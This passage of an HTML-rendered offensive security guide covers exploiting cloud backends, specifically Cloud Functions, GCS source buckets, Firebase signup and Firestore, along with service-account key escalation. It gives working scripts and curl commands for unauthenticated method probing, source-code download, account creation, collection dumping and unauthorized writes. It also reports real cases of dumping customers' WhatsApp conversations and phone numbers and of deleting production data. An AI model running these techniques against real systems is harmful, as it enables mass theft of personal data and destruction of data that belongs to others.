&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;404&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;20&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;✅ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;100&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="93-testing-http-methods-get-post-put-delete" &gt;
&lt;div&gt;
&lt;a href="#93-testing-http-methods-get-post-put-delete"&gt;
##
&lt;/a&gt;
9.3 Testing HTTP Methods (GET, POST, PUT, DELETE)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;methods &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GET&amp;#34;&lt;/span&gt;: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;lambda&lt;/span&gt; u: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(u, json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;}),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;PUT&amp;#34;&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;lambda&lt;/span&gt; u: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;put(u, json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test&amp;#34;&lt;/span&gt;}),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;DELETE&amp;#34;&lt;/span&gt;: &lt;span style="color:#ca9ee6"&gt;lambda&lt;/span&gt; u: requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;delete(u),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; method_name, method_func &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; methods&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; method_func(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;not&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;401&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;403&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;404&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;405&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;method_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (ACCEPTED!)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;else&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;method_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: 6 Cloud Functions of the fitness tech company ecosystem with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;GET&lt;/strong&gt; without auth → dump of 15,800+ posts, 389+ users, real student data&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DELETE&lt;/strong&gt; without auth → confirmed destruction of production data (tested with real IDs)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reflected CORS&lt;/strong&gt; on ALL 6 functions → drive-by attack possible&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;705 PDF tokens&lt;/strong&gt; leaked from one of the functions&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="94-source-code-buckets-gcp" &gt;
&lt;div&gt;
&lt;a href="#94-source-code-buckets-gcp"&gt;
##
&lt;/a&gt;
9.4 Source Code Buckets (GCP)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Every Cloud Function has its source code stored in GCS buckets:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;gcf-sources-{PROJECT_NUMBER}-{REGION}
gcf-v2-sources-{PROJECT_NUMBER}-{REGION}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;If the SA key has read permission, the source code can be downloaded:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; {Storage} &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; require(&lt;span style="color:#a6d189"&gt;&amp;#39;@google-cloud/storage&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; storage &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;new&lt;/span&gt; Storage({credentials&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; sa});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; bucket &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; storage.bucket(&lt;span style="color:#a6d189"&gt;&amp;#39;gcf-sources-706681009423-us-central1&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; [files] &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; bucket.getFiles();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; (&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; f &lt;span style="color:#ca9ee6"&gt;of&lt;/span&gt; files.filter(f =&amp;gt; f.name.endsWith(&lt;span style="color:#a6d189"&gt;&amp;#39;.zip&amp;#39;&lt;/span&gt;))) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; f.download({destination&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;/tmp/&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; f.name.replace(&lt;span style="color:#81c8be"&gt;/\//g&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;_&amp;#39;&lt;/span&gt;)});
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="10-firebase-firestore--gcp-exploitation" &gt;
&lt;div&gt;
&lt;a href="#10-firebase-firestore--gcp-exploitation"&gt;
#
&lt;/a&gt;
10. FIREBASE, FIRESTORE &amp;amp; GCP EXPLOITATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="101-firebase-api-key--what-it-allows" &gt;
&lt;div&gt;
&lt;a href="#101-firebase-api-key--what-it-allows"&gt;
##
&lt;/a&gt;
10.1 Firebase API Key → What It Allows
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;The Firebase API Key (found in JS bundles, apps) is NOT secret, but allows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Firebase Auth&lt;/strong&gt;: create accounts (signUp), login (signIn)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Firestore&lt;/strong&gt;: if security rules allow public read/write&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Storage&lt;/strong&gt;: if rules allow public access&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Realtime Database&lt;/strong&gt;: if rules allow it&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Typical Firebase Config found in JS bundles:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; firebaseConfig &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apiKey&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AIzaSyC...&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; authDomain&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;project.firebaseapp.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; projectId&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;project-id&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; storageBucket&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;project-id.appspot.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; messagingSenderId&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;123456789&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appId&lt;span style="color:#99d1db;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;1:123456789:web:abcdef...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;};
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="102-open-signup--create-account-without-invite" &gt;
&lt;div&gt;
&lt;a href="#102-open-signup--create-account-without-invite"&gt;
##
&lt;/a&gt;
10.2 Open SignUp — Create Account Without Invite
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;email&amp;#34;:&amp;#34;attacker@domain.com&amp;#34;,&amp;#34;password&amp;#34;:&amp;#34;Senha123!&amp;#34;,&amp;#34;returnSecureToken&amp;#34;:true}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Response includes:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - idToken (Firebase JWT to use with APIs)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - localId (user UID)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - refreshToken&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Delivery platform — open signUp in Firebase project. Creating an account gave read access to 204K WhatsApp conversations, 173K customer phone numbers, and public storage with 1K+ MP3 audio files.&lt;/p&gt;
&lt;h3 id="103-firestore--test-public-access" &gt;
&lt;div&gt;
&lt;a href="#103-firestore--test-public-access"&gt;
##
&lt;/a&gt;
10.3 Firestore — Test Public Access
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List collections (requires SDK, not direct REST)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# But via REST API:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Try to list documents from common collections&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/users?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/stores?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/conversations?key=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$API_KEY&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If security rules are misconfigured → FULL DUMP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test WRITE (PATCH)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PATCH &lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PROJECT_ID&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents/stores/{ID}?updateMask.fieldPaths=fieldName&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;fields&amp;#34;:{&amp;#34;fieldName&amp;#34;:{&amp;#34;stringValue&amp;#34;:&amp;#34;test&amp;#34;}}}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Delivery platform — 3 Firebase projects with public Firestore:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{project}-app&lt;/code&gt;: 4,000 stores (CNPJ, GPS, phone, menu) + PATCH write confirmed&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{project}-whatsapp-bot&lt;/code&gt;: 204K WhatsApp conversations, 173K customer phone numbers, order content and addresses&lt;/li&gt;
&lt;li&gt;Storage &lt;code&gt;{project}-whatsapp-bot-media&lt;/code&gt;: 1K+ public MP3 audio files&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="104-service-account-key--escalation-to-gcp" &gt;
&lt;div&gt;
&lt;a href="#104-service-account-key--escalation-to-gcp"&gt;
##
&lt;/a&gt;
10.4 Service Account Key — Escalation to GCP
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If you find an SA key (JSON with &lt;code&gt;private_key&lt;/code&gt; and &lt;code&gt;client_email&lt;/code&gt;):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; hashes, serialization
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.primitives.asymmetric&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; padding &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; pad
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;from&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;cryptography.hazmat.backends&lt;/span&gt; &lt;span style="color:#81c8be"&gt;import&lt;/span&gt; default_backend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;get_gcp_token&lt;/span&gt;(sa_key):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Generates a GCP access token from an SA key.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; now &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;int&lt;/span&gt;(time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; header &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlsafe_b64encode(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;dumps({&lt;span style="color:#a6d189"&gt;&amp;#34;alg&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;RS256&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;typ&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;})&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;encode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;rstrip(&lt;span style="color:#e78284"&gt;b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;=&amp;#39;&lt;/span&gt;)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; claims &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;iss&amp;#34;&lt;/span&gt;: sa_key[&lt;span style="color:#a6d189"&gt;&amp;#39;client_email&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;scope&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;https://www.googleapis.com/auth/cloud-platform&amp;#34;&lt;/span&gt;,
